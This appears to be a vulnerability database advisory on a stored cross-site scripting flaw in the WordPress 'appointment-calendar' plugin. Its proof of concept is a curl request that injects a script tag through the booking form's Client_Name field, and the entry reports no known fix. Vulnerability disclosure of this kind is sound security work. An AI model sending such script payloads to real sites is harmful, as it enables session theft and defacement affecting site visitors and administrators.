Appointment Calendar – Stored Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

When user submist data from appointments there is no validation which leads to stored XSS.

Proof of Concept

curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Host: localhost'  -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0' -H 'X-Requested-With: XMLHttpRequest' --data 'ServiceId=1&AppDate=02-11-2016&StartTime=10:30 AM&Client_Name=<script>alert("hello")</script>&Client_Email=test@test.com&Client_Phone=123456&Client_Note=&Service_Duration=30'

Affects Plugins

appointment-calendar

No known fix

References

URL

https://wordpress.org/plugins/appointment-calendar/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

Naeem Shah

Verified

No

WPVDB ID

a77dc411-37ca-4ded-a873-dd5f8be5a8ec

Timeline

Publicly Published

2016-09-30 (about 9 years ago)

Added

2016-10-01 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2023-01-13

Title

MonsterInsights < 8.12.1 - Contributor+ Stored XSS

Published

2024-06-28

Title

Branda < 3.4.18 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2016-07-24

Title

Code Snippets < 2.7.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2025-09-22

Title

StylePress for Elementor <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-10-15

Title

Cooked Pro < 1.8.0 - Authenticated (Contributor+) Stored Cross-Site Scripting